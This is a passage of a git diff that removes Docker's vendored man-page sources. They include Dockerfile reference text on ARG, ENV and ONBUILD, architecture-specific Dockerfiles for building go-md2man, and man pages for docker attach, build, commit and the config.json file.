-  2 ARG CONT_IMG_VER
-  3 ENV CONT_IMG_VER v1.0.0
-  4 RUN echo $CONT_IMG_VER
-  ```
-  Then, assume this image is built with this command:
-
-  ```
-  $ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile
-  ```
-
-  In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting
-  passed by the user:`v2.0.1` This behavior is similar to a shell
-  script where a locally scoped variable overrides the variables passed as
-  arguments or inherited from environment, from its point of definition.
-
-  Using the example above but a different `ENV` specification you can create more
-  useful interactions between `ARG` and `ENV` instructions:
-
-  ```
-  1 FROM ubuntu
-  2 ARG CONT_IMG_VER
-  3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0}
-  4 RUN echo $CONT_IMG_VER
-  ```
-
-  Unlike an `ARG` instruction, `ENV` values are always persisted in the built
-  image. Consider a docker build without the --build-arg flag:
-
-  ```
-  $ docker build Dockerfile
-  ```
-
-  Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but
-  its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction.
-
-  The variable expansion technique in this example allows you to pass arguments
-  from the command line and persist them in the final image by leveraging the
-  `ENV` instruction. Variable expansion is only supported for [a limited set of
-  Dockerfile instructions.](#environment-replacement)
-
-  Docker has a set of predefined `ARG` variables that you can use without a
-  corresponding `ARG` instruction in the Dockerfile.
-
-  * `HTTP_PROXY`
-  * `http_proxy`
-  * `HTTPS_PROXY`
-  * `https_proxy`
-  * `FTP_PROXY`
-  * `ftp_proxy`
-  * `NO_PROXY`
-  * `no_proxy`
-
-  To use these, simply pass them on the command line using the `--build-arg
-  <varname>=<value>` flag.
-
-**ONBUILD**
-  -- `ONBUILD [INSTRUCTION]`
-  The **ONBUILD** instruction adds a trigger instruction to an image. The
-  trigger is executed at a later time, when the image is used as the base for
-  another build. Docker executes the trigger in the context of the downstream
-  build, as if the trigger existed immediately after the **FROM** instruction in
-  the downstream Dockerfile.
-
-  You can register any build instruction as a trigger. A trigger is useful if
-  you are defining an image to use as a base for building other images. For
-  example, if you are defining an application build environment or a daemon that
-  is customized with a user-specific configuration.  
-
-  Consider an image intended as a reusable python application builder. It must
-  add application source code to a particular directory, and might need a build
-  script called after that. You can't just call **ADD** and **RUN** now, because
-  you don't yet have access to the application source code, and it is different
-  for each application build.
-
-  -- Providing application developers with a boilerplate Dockerfile to copy-paste
-  into their application is inefficient, error-prone, and
-  difficult to update because it mixes with application-specific code.
-  The solution is to use **ONBUILD** to register instructions in advance, to
-  run later, during the next build stage.
-
-# HISTORY
-*May 2014, Compiled by Zac Dover (zdover at redhat dot com) based on docker.com Dockerfile documentation.
-*Feb 2015, updated by Brian Goff (cpuguy83@gmail.com) for readability
-*Sept 2015, updated by Sally O'Malley (somalley@redhat.com)
-*Oct 2016, updated by Addam Hardy (addam.hardy@gmail.com)
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.aarch64 b/vendor/github.com/docker/docker/man/Dockerfile.aarch64
deleted file mode 100644
index e788eb1c1d..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile.aarch64
+++ /dev/null
@@ -1,25 +0,0 @@
-FROM    aarch64/ubuntu:xenial
-
-RUN     apt-get update && apt-get install -y git golang-go
-
-RUN     mkdir -p /go/src /go/bin /go/pkg
-ENV     GOPATH=/go
-RUN     export GLIDE=v0.11.1; \
-        export TARGET=/go/src/github.com/Masterminds; \
-        mkdir -p ${TARGET} && \
-        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
-        cd ${TARGET}/glide && \
-        git checkout $GLIDE && \
-        make build && \
-        cp ./glide /usr/bin/glide && \
-        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
-
-COPY    glide.yaml /manvendor/
-COPY    glide.lock /manvendor/
-WORKDIR /manvendor/
-RUN     glide install && mv vendor src
-ENV     GOPATH=$GOPATH:/manvendor
-RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
-
-WORKDIR /go/src/github.com/docker/docker/
-ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.armhf b/vendor/github.com/docker/docker/man/Dockerfile.armhf
deleted file mode 100644
index e7ea495646..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile.armhf
+++ /dev/null
@@ -1,43 +0,0 @@
-FROM armhf/debian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-RUN apt-get update && apt-get install -y \
-  git \
-  bash \
-  curl \
-  gcc \
-  make
-
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \
-  | tar -xzC /usr/local
-ENV PATH /go/bin:/usr/local/go/bin:$PATH
-ENV GOPATH /go
-
-# We're building for armhf, which is ARMv7, so let's be explicit about that
-ENV GOARCH arm
-ENV GOARM 7
-
-RUN     mkdir -p /go/src /go/bin /go/pkg
-RUN     export GLIDE=v0.11.1; \
-        export TARGET=/go/src/github.com/Masterminds; \
-        mkdir -p ${TARGET} && \
-        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
-        cd ${TARGET}/glide && \
-        git checkout $GLIDE && \
-        make build && \
-        cp ./glide /usr/bin/glide && \
-        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
-
-COPY    glide.yaml /manvendor/
-COPY    glide.lock /manvendor/
-WORKDIR /manvendor/
-RUN     glide install && mv vendor src
-ENV     GOPATH=$GOPATH:/manvendor
-RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
-
-WORKDIR /go/src/github.com/docker/docker/
-ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le b/vendor/github.com/docker/docker/man/Dockerfile.ppc64le
deleted file mode 100644
index fc96ca7691..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile.ppc64le
+++ /dev/null
@@ -1,35 +0,0 @@
-FROM    ppc64le/ubuntu:xenial
-
-RUN     apt-get update && apt-get install -y \
-        curl \
-        gcc \
-        git \
-        make \
-        tar
-
-ENV     GO_VERSION 1.7.5
-RUN     curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" \
-        | tar -xzC /usr/local
-ENV     PATH /usr/local/go/bin:$PATH
-ENV     GOPATH=/go
-
-RUN     mkdir -p /go/src /go/bin /go/pkg
-RUN     export GLIDE=v0.11.1; \
-        export TARGET=/go/src/github.com/Masterminds; \
-        mkdir -p ${TARGET} && \
-        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
-        cd ${TARGET}/glide && \
-        git checkout $GLIDE && \
-        make build && \
-        cp ./glide /usr/bin/glide && \
-        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
-
-COPY    glide.yaml /manvendor/
-COPY    glide.lock /manvendor/
-WORKDIR /manvendor/
-RUN     glide install && mv vendor src
-ENV     GOPATH=$GOPATH:/manvendor
-RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
-
-WORKDIR /go/src/github.com/docker/docker/
-ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/Dockerfile.s390x b/vendor/github.com/docker/docker/man/Dockerfile.s390x
deleted file mode 100644
index d4bcf1da11..0000000000
--- a/vendor/github.com/docker/docker/man/Dockerfile.s390x
+++ /dev/null
@@ -1,35 +0,0 @@
-FROM    s390x/ubuntu:xenial
-
-RUN     apt-get update && apt-get install -y \
-        curl \
-        gcc \
-        git \
-        make \
-        tar
-
-ENV     GO_VERSION 1.7.5
-RUN     curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" \
-        | tar -xzC /usr/local
-ENV     PATH /usr/local/go/bin:$PATH
-ENV     GOPATH=/go
-
-RUN     mkdir -p /go/src /go/bin /go/pkg
-RUN     export GLIDE=v0.11.1; \
-        export TARGET=/go/src/github.com/Masterminds; \
-        mkdir -p ${TARGET} && \
-        git clone https://github.com/Masterminds/glide.git ${TARGET}/glide && \
-        cd ${TARGET}/glide && \
-        git checkout $GLIDE && \
-        make build && \
-        cp ./glide /usr/bin/glide && \
-        cd / && rm -rf /go/src/* /go/bin/* /go/pkg/*
-
-COPY    glide.yaml /manvendor/
-COPY    glide.lock /manvendor/
-WORKDIR /manvendor/
-RUN     glide install && mv vendor src
-ENV     GOPATH=$GOPATH:/manvendor
-RUN     go build -o /usr/bin/go-md2man github.com/cpuguy83/go-md2man
-
-WORKDIR /go/src/github.com/docker/docker/
-ENTRYPOINT ["man/generate.sh"]
diff --git a/vendor/github.com/docker/docker/man/README.md b/vendor/github.com/docker/docker/man/README.md
deleted file mode 100644
index 82dac650f9..0000000000
--- a/vendor/github.com/docker/docker/man/README.md
+++ /dev/null
@@ -1,15 +0,0 @@
-Docker Documentation
-====================
-
-This directory contains scripts for generating the man pages. Many of the man
-pages are generated directly from the `spf13/cobra` `Command` definition. Some
-legacy pages are still generated from the markdown files in this directory.
-Do *not* edit the man pages in the man1 directory. Instead, update the
-Cobra command or amend the Markdown files for legacy pages.
-
-
-## Generate the man pages
-
-From within the project root directory run:
-
-    make manpages
diff --git a/vendor/github.com/docker/docker/man/docker-attach.1.md b/vendor/github.com/docker/docker/man/docker-attach.1.md
deleted file mode 100644
index c39d1c9290..0000000000
--- a/vendor/github.com/docker/docker/man/docker-attach.1.md
+++ /dev/null
@@ -1,99 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-attach - Attach to a running container
-
-# SYNOPSIS
-**docker attach**
-[**--detach-keys**[=*[]*]]
-[**--help**]
-[**--no-stdin**]
-[**--sig-proxy**[=*true*]]
-CONTAINER
-
-# DESCRIPTION
-The **docker attach** command allows you to attach to a running container using
-the container's ID or name, either to view its ongoing output or to control it
-interactively.  You can attach to the same contained process multiple times
-simultaneously, screen sharing style, or quickly view the progress of your
-detached process.
-
-To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the
-container. You can detach from the container (and leave it running) using a
-configurable key sequence. The default sequence is `CTRL-p CTRL-q`. You
-configure the key sequence using the **--detach-keys** option or a configuration
-file. See **config-json(5)** for documentation on using a configuration file.
-
-It is forbidden to redirect the standard input of a `docker attach` command while
-attaching to a tty-enabled container (i.e.: launched with `-t`).
-
-# OPTIONS
-**--detach-keys**=""
-    Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
-
-**--help**
-  Print usage statement
-
-**--no-stdin**=*true*|*false*
-   Do not attach STDIN. The default is *false*.
-
-**--sig-proxy**=*true*|*false*
-   Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied. The default is *true*.
-
-# Override the detach sequence
-
-If you want, you can configure an override the Docker key sequence for detach.
-This is useful if the Docker default sequence conflicts with key sequence you
-use for other applications. There are two ways to define your own detach key
-sequence, as a per-container override or as a configuration property on  your
-entire configuration.
-
-To override the sequence for an individual container, use the
-`--detach-keys="<sequence>"` flag with the `docker attach` command. The format of
-the `<sequence>` is either a letter [a-Z], or the `ctrl-` combined with any of
-the following:
-
-* `a-z` (a single lowercase alpha character )
-* `@` (at sign)
-* `[` (left bracket)
-* `\\` (two backward slashes)
-*  `_` (underscore)
-* `^` (caret)
-
-These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key
-sequences. To configure a different configuration default key sequence for all
-containers, see **docker(1)**.
-
-# EXAMPLES
-
-## Attaching to a container
-
-In this example the top command is run inside a container, from an image called
-fedora, in detached mode. The ID from the container is passed into the **docker
-attach** command:
-
-    # ID=$(sudo docker run -d fedora /usr/bin/top -b)
-    # sudo docker attach $ID
-    top - 02:05:52 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
-    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-    Cpu(s):  0.1%us,  0.2%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
-    Mem:    373572k total,   355560k used,    18012k free,    27872k buffers
-    Swap:   786428k total,        0k used,   786428k free,   221740k cached
-
-    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
-    1 root      20   0 17200 1116  912 R    0  0.3   0:00.03 top
-
-    top - 02:05:55 up  3:05,  0 users,  load average: 0.01, 0.02, 0.05
-    Tasks:   1 total,   1 running,   0 sleeping,   0 stopped,   0 zombie
-    Cpu(s):  0.0%us,  0.2%sy,  0.0%ni, 99.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
-    Mem:    373572k total,   355244k used,    18328k free,    27872k buffers
-    Swap:   786428k total,        0k used,   786428k free,   221776k cached
-
-    PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
-    1 root      20   0 17208 1144  932 R    0  0.3   0:00.03 top
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-build.1.md b/vendor/github.com/docker/docker/man/docker-build.1.md
deleted file mode 100644
index 4beee88e4a..0000000000
--- a/vendor/github.com/docker/docker/man/docker-build.1.md
+++ /dev/null
@@ -1,340 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-build - Build an image from a Dockerfile
-
-# SYNOPSIS
-**docker build**
-[**--build-arg**[=*[]*]]
-[**--cpu-shares**[=*0*]]
-[**--cgroup-parent**[=*CGROUP-PARENT*]]
-[**--help**]
-[**-f**|**--file**[=*PATH/Dockerfile*]]
-[**-squash**] *Experimental*
-[**--force-rm**]
-[**--isolation**[=*default*]]
-[**--label**[=*[]*]]
-[**--no-cache**]
-[**--pull**]
-[**--compress**]
-[**-q**|**--quiet**]
-[**--rm**[=*true*]]
-[**-t**|**--tag**[=*[]*]]
-[**-m**|**--memory**[=*MEMORY*]]
-[**--memory-swap**[=*LIMIT*]]
-[**--network**[=*"default"*]]
-[**--shm-size**[=*SHM-SIZE*]]
-[**--cpu-period**[=*0*]]
-[**--cpu-quota**[=*0*]]
-[**--cpuset-cpus**[=*CPUSET-CPUS*]]
-[**--cpuset-mems**[=*CPUSET-MEMS*]]
-[**--ulimit**[=*[]*]]
-PATH | URL | -
-
-# DESCRIPTION
-This will read the Dockerfile from the directory specified in **PATH**.
-It also sends any other files and directories found in the current
-directory to the Docker daemon. The contents of this directory would
-be used by **ADD** commands found within the Dockerfile.
-
-Warning, this will send a lot of data to the Docker daemon depending
-on the contents of the current directory. The build is run by the Docker
-daemon, not by the CLI, so the whole context must be transferred to the daemon. 
-The Docker CLI reports "Sending build context to Docker daemon" when the context is sent to
-the daemon.
-
-When the URL to a tarball archive or to a single Dockerfile is given, no context is sent from
-the client to the Docker daemon. In this case, the Dockerfile at the root of the archive and
-the rest of the archive will get used as the context of the build.  When a Git repository is
-set as the **URL**, the repository is cloned locally and then sent as the context.
-
-# OPTIONS
-**-f**, **--file**=*PATH/Dockerfile*
-   Path to the Dockerfile to use. If the path is a relative path and you are
-   building from a local directory, then the path must be relative to that
-   directory. If you are building from a remote URL pointing to either a
-   tarball or a Git repository, then the path must be relative to the root of
-   the remote context. In all cases, the file must be within the build context.
-   The default is *Dockerfile*.
-
-**--squash**=*true*|*false*
-   **Experimental Only**
-   Once the image is built, squash the new layers into a new image with a single
-   new layer. Squashing does not destroy any existing image, rather it creates a new
-   image with the content of the squshed layers. This effectively makes it look
-   like all `Dockerfile` commands were created with a single layer. The build
-   cache is preserved with this method.
-
-   **Note**: using this option means the new image will not be able to take
-   advantage of layer sharing with other images and may use significantly more
-   space.
-
-   **Note**: using this option you may see significantly more space used due to
-   storing two copies of the image, one for the build cache with all the cache
-   layers in tact, and one for the squashed version.
-
-**--build-arg**=*variable*
-   name and value of a **buildarg**.
-
-   For example, if you want to pass a value for `http_proxy`, use
-   `--build-arg=http_proxy="http://some.proxy.url"`
-
-   Users pass these values at build-time. Docker uses the `buildargs` as the
-   environment context for command(s) run via the Dockerfile's `RUN` instruction
-   or for variable expansion in other Dockerfile instructions. This is not meant
-   for passing secret values. [Read more about the buildargs instruction](https://docs.docker.com/engine/reference/builder/#arg)
-
-**--force-rm**=*true*|*false*
-   Always remove intermediate containers, even after unsuccessful builds. The default is *false*.
-
-**--isolation**="*default*"
-   Isolation specifies the type of isolation technology used by containers. 
-
-**--label**=*label*
-   Set metadata for an image
-
-**--no-cache**=*true*|*false*
-   Do not use cache when building the image. The default is *false*.
-
-**--help**
-  Print usage statement
-
-**--pull**=*true*|*false*
-   Always attempt to pull a newer version of the image. The default is *false*.
-
-**--compress**=*true*|*false*
-    Compress the build context using gzip. The default is *false*.
-
-**-q**, **--quiet**=*true*|*false*
-   Suppress the build output and print image ID on success. The default is *false*.
-
-**--rm**=*true*|*false*
-   Remove intermediate containers after a successful build. The default is *true*.
-
-**-t**, **--tag**=""
-   Repository names (and optionally with tags) to be applied to the resulting 
-   image in case of success. Refer to **docker-tag(1)** for more information
-   about valid tag names.
-
-**-m**, **--memory**=*MEMORY*
-  Memory limit
-
-**--memory-swap**=*LIMIT*
-   A limit value equal to memory plus swap. Must be used with the  **-m**
-(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
-(**--memory**) value.
-
-   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
-`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
-unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
-
-**--network**=*bridge*
-  Set the networking mode for the RUN instructions during build. Supported standard
-  values are: `bridge`, `host`, `none` and `container:<name|id>`. Any other value
-  is taken as a custom network's name or ID which this container should connect to.
-
-**--shm-size**=*SHM-SIZE*
-  Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`.
-  Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes.
-  If you omit the size entirely, the system uses `64m`.
-
-**--cpu-shares**=*0*
-  CPU shares (relative weight).
-
-  By default, all containers get the same proportion of CPU cycles.
-  CPU shares is a 'relative weight', relative to the default setting of 1024.
-  This default value is defined here: 
-  ```
-   cat /sys/fs/cgroup/cpu/cpu.shares
-   1024
-  ```
-  You can change this proportion by adjusting the container's CPU share 
-  weighting relative to the weighting of all other running containers.
-
-  To modify the proportion from the default of 1024, use the **--cpu-shares**
-  flag to set the weighting to 2 or higher.
-
-      Container   CPU share    Flag             
-      {C0}        60% of CPU  --cpu-shares=614 (614 is 60% of 1024)
-      {C1}        40% of CPU  --cpu-shares=410 (410 is 40% of 1024)
-
-  The proportion is only applied when CPU-intensive processes are running.
-  When tasks in one container are idle, the other containers can use the
-  left-over CPU time. The actual amount of CPU time used varies depending on
-  the number of containers running on the system.
-
-  For example, consider three containers, where one has **--cpu-shares=1024** and
-  two others have **--cpu-shares=512**. When processes in all three
-  containers attempt to use 100% of CPU, the first container would receive
-  50% of the total CPU time. If you add a fourth container with **--cpu-shares=1024**,
-  the first container only gets 33% of the CPU. The remaining containers
-  receive 16.5%, 16.5% and 33% of the CPU.
-
-
-      Container   CPU share   Flag                CPU time            
-      {C0}        100%        --cpu-shares=1024   33%
-      {C1}        50%         --cpu-shares=512    16.5%
-      {C2}        50%         --cpu-shares=512    16.5%
-      {C4}        100%        --cpu-shares=1024   33%
-
-
-  On a multi-core system, the shares of CPU time are distributed across the CPU
-  cores. Even if a container is limited to less than 100% of CPU time, it can
-  use 100% of each individual CPU core.
-
-  For example, consider a system with more than three cores. If you start one
-  container **{C0}** with **--cpu-shares=512** running one process, and another container
-  **{C1}** with **--cpu-shares=1024** running two processes, this can result in the following
-  division of CPU shares:
-
-      PID    container    CPU    CPU share
-      100    {C0}         0      100% of CPU0
-      101    {C1}         1      100% of CPU1
-      102    {C1}         2      100% of CPU2
-
-**--cpu-period**=*0*
-  Limit the CPU CFS (Completely Fair Scheduler) period.
-
-  Limit the container's CPU usage. This flag causes the kernel to restrict the
-  container's CPU usage to the period you specify.
-
-**--cpu-quota**=*0*
-  Limit the CPU CFS (Completely Fair Scheduler) quota. 
-
-  By default, containers run with the full CPU resource. This flag causes the
-kernel to restrict the container's CPU usage to the quota you specify.
-
-**--cpuset-cpus**=*CPUSET-CPUS*
-  CPUs in which to allow execution (0-3, 0,1).
-
-**--cpuset-mems**=*CPUSET-MEMS*
-  Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on
-  NUMA systems.
-
-  For example, if you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1`
-to ensure the processes in your Docker container only use memory from the first
-two memory nodes.
-
-**--cgroup-parent**=*CGROUP-PARENT*
-  Path to `cgroups` under which the container's `cgroup` are created.
-
-  If the path is not absolute, the path is considered relative to the `cgroups` path of the init process.
-Cgroups are created if they do not already exist.
-
-**--ulimit**=[]
-  Ulimit options
-
-  For more information about `ulimit` see [Setting ulimits in a 
-container](https://docs.docker.com/engine/reference/commandline/run/#set-ulimits-in-container---ulimit)
-
-# EXAMPLES
-
-## Building an image using a Dockerfile located inside the current directory
-
-Docker images can be built using the build command and a Dockerfile:
-
-    docker build .
-
-During the build process Docker creates intermediate images. In order to
-keep them, you must explicitly set `--rm=false`.
-
-    docker build --rm=false .
-
-A good practice is to make a sub-directory with a related name and create
-the Dockerfile in that directory. For example, a directory called mongo may
-contain a Dockerfile to create a Docker MongoDB image. Likewise, another
-directory called httpd may be used to store Dockerfiles for Apache web
-server images.
-
-It is also a good practice to add the files required for the image to the
-sub-directory. These files will then be specified with the `COPY` or `ADD`
-instructions in the `Dockerfile`.
-
-Note: If you include a tar file (a good practice), then Docker will
-automatically extract the contents of the tar file specified within the `ADD`
-instruction into the specified target.
-
-## Building an image and naming that image
-
-A good practice is to give a name to the image you are building. Note that 
-only a-z0-9-_. should be used for consistency.  There are no hard rules here but it is best to give the names consideration. 
-
-The **-t**/**--tag** flag is used to rename an image. Here are some examples:
-
-Though it is not a good practice, image names can be arbitrary:
-
-    docker build -t myimage .
-
-A better approach is to provide a fully qualified and meaningful repository,
-name, and tag (where the tag in this context means the qualifier after 
-the ":"). In this example we build a JBoss image for the Fedora repository 
-and give it the version 1.0:
-
-    docker build -t fedora/jboss:1.0 .
-
-The next example is for the "whenry" user repository and uses Fedora and
-JBoss and gives it the version 2.1 :
-
-    docker build -t whenry/fedora-jboss:v2.1 .
-
-If you do not provide a version tag then Docker will assign `latest`:
-
-    docker build -t whenry/fedora-jboss .
-
-When you list the images, the image above will have the tag `latest`.
-
-You can apply multiple tags to an image. For example, you can apply the `latest`
-tag to a newly built image and add another tag that references a specific
-version.
-For example, to tag an image both as `whenry/fedora-jboss:latest` and
-`whenry/fedora-jboss:v2.1`, use the following:
-
-    docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 .
-
-So renaming an image is arbitrary but consideration should be given to 
-a useful convention that makes sense for consumers and should also take
-into account Docker community conventions.
-
-
-## Building an image using a URL
-
-This will clone the specified GitHub repository from the URL and use it
-as context. The Dockerfile at the root of the repository is used as
-Dockerfile. This only works if the GitHub repository is a dedicated
-repository.
-
-    docker build github.com/scollier/purpletest
-
-Note: You can set an arbitrary Git repository via the `git://` scheme.
-
-## Building an image using a URL to a tarball'ed context
-
-This will send the URL itself to the Docker daemon. The daemon will fetch the
-tarball archive, decompress it and use its contents as the build context.  The 
-Dockerfile at the root of the archive and the rest of the archive will get used
-as the context of the build. If you pass an **-f PATH/Dockerfile** option as well,
-the system will look for that file inside the contents of the tarball.
-
-    docker build -f dev/Dockerfile https://10.10.10.1/docker/context.tar.gz
-
-Note: supported compression formats are 'xz', 'bzip2', 'gzip' and 'identity' (no compression).
-
-## Specify isolation technology for container (--isolation)
-
-This option is useful in situations where you are running Docker containers on
-Windows. The `--isolation=<value>` option sets a container's isolation
-technology. On Linux, the only supported is the `default` option which uses
-Linux namespaces. On Microsoft Windows, you can specify these values:
-
-* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
-* `process`: Namespace isolation only.
-* `hyperv`: Hyper-V hypervisor partition-based isolation.
-
-Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`.
-
-# HISTORY
-March 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and internal work.
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-commit.1.md b/vendor/github.com/docker/docker/man/docker-commit.1.md
deleted file mode 100644
index d8a4cf8387..0000000000
--- a/vendor/github.com/docker/docker/man/docker-commit.1.md
+++ /dev/null
@@ -1,71 +0,0 @@
-% DOCKER(1) Docker User Manuals
-% Docker Community
-% JUNE 2014
-# NAME
-docker-commit - Create a new image from a container's changes
-
-# SYNOPSIS
-**docker commit**
-[**-a**|**--author**[=*AUTHOR*]]
-[**-c**|**--change**[=\[*DOCKERFILE INSTRUCTIONS*\]]]
-[**--help**]
-[**-m**|**--message**[=*MESSAGE*]]
-[**-p**|**--pause**[=*true*]]
-CONTAINER [REPOSITORY[:TAG]]
-
-# DESCRIPTION
-Create a new image from an existing container specified by name or
-container ID.  The new image will contain the contents of the
-container filesystem, *excluding* any data volumes. Refer to **docker-tag(1)**
-for more information about valid image and tag names.
-
-While the `docker commit` command is a convenient way of extending an
-existing image, you should prefer the use of a Dockerfile and `docker
-build` for generating images that you intend to share with other
-people.
-
-# OPTIONS
-**-a**, **--author**=""
-   Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")
-
-**-c** , **--change**=[]
-   Apply specified Dockerfile instructions while committing the image
-   Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR`
-
-**--help**
-  Print usage statement
-
-**-m**, **--message**=""
-   Commit message
-
-**-p**, **--pause**=*true*|*false*
-   Pause container during commit. The default is *true*.
-
-# EXAMPLES
-
-## Creating a new image from an existing container
-An existing Fedora based container has had Apache installed while running
-in interactive mode with the bash shell. Apache is also running. To
-create a new image run `docker ps` to find the container's ID and then run:
-
-    # docker commit -m="Added Apache to Fedora base image" \
-      -a="A D Ministrator" 98bd7fc99854 fedora/fedora_httpd:20
-
-Note that only a-z0-9-_. are allowed when naming images from an 
-existing container.
-
-## Apply specified Dockerfile instructions while committing the image
-If an existing container was created without the DEBUG environment
-variable set to "true", you can create a new image based on that
-container by first getting the container's ID with `docker ps` and
-then running:
-
-    # docker commit -c="ENV DEBUG true" 98bd7fc99854 debug-image
-
-# HISTORY
-April 2014, Originally compiled by William Henry (whenry at redhat dot com)
-based on docker.com source material and in
-June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
-Oct 2014, updated by Daniel, Dao Quang Minh <daniel at nitrous dot io>
-June 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-config-json.5.md b/vendor/github.com/docker/docker/man/docker-config-json.5.md
deleted file mode 100644
index 49987f08b8..0000000000
--- a/vendor/github.com/docker/docker/man/docker-config-json.5.md
+++ /dev/null
@@ -1,72 +0,0 @@
-% CONFIG.JSON(5) Docker User Manuals
-% Docker Community
-% JANUARY 2016
-# NAME
-HOME/.docker/config.json - Default Docker configuration file
-
-# INTRODUCTION
-
-By default, the Docker command line stores its configuration files in a
-directory called `.docker` within your `$HOME` directory.  Docker manages most of
-the files in the configuration directory and you should not modify them.
-However, you *can modify* the `config.json` file to control certain aspects of
-how the `docker` command behaves.
-
-Currently, you can modify the `docker` command behavior using environment
-variables or command-line options. You can also use options within
-`config.json` to modify some of the same behavior. When using these
-mechanisms, you must keep in mind the order of precedence among them. Command
-line options override environment variables and environment variables override
-properties you specify in a `config.json` file.
-
-The `config.json` file stores a JSON encoding of several properties:
-
-* The `HttpHeaders` property specifies a set of headers to include in all messages
-sent from the Docker client to the daemon. Docker does not try to interpret or
-understand these header; it simply puts them into the messages. Docker does not
-allow these headers to change any headers it sets for itself.
-
-* The `psFormat` property specifies the default format for `docker ps` output.
-When the `--format` flag is not provided with the `docker ps` command,
-Docker's client uses this property. If this property is not set, the client
-falls back to the default table format. For a list of supported formatting
-directives, see **docker-ps(1)**.
-
-* The `detachKeys` property specifies the default key sequence which
-detaches the container. When the `--detach-keys` flag is not provide
-with the `docker attach`, `docker exec`, `docker run` or `docker
-start`, Docker's client uses this property. If this property is not
-set, the client falls back to the default sequence `ctrl-p,ctrl-q`.
-
-
-* The `imagesFormat` property  specifies the default format for `docker images`
-output. When the `--format` flag is not provided with the `docker images`
-command, Docker's client uses this property. If this property is not set, the
-client falls back to the default table format. For a list of supported
-formatting directives, see **docker-images(1)**.
-
-You can specify a different location for the configuration files via the
-`DOCKER_CONFIG` environment variable or the `--config` command line option. If
-both are specified, then the `--config` option overrides the `DOCKER_CONFIG`
-environment variable:
-
-    docker --config ~/testconfigs/ ps
-
-This command instructs Docker to use the configuration files in the
-`~/testconfigs/` directory when running the `ps` command.
-
-## Examples
-
-Following is a sample `config.json` file:
-
-    {
-      "HttpHeaders": {
-        "MyHeader": "MyValue"
-      },
-      "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}",
-      "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}",
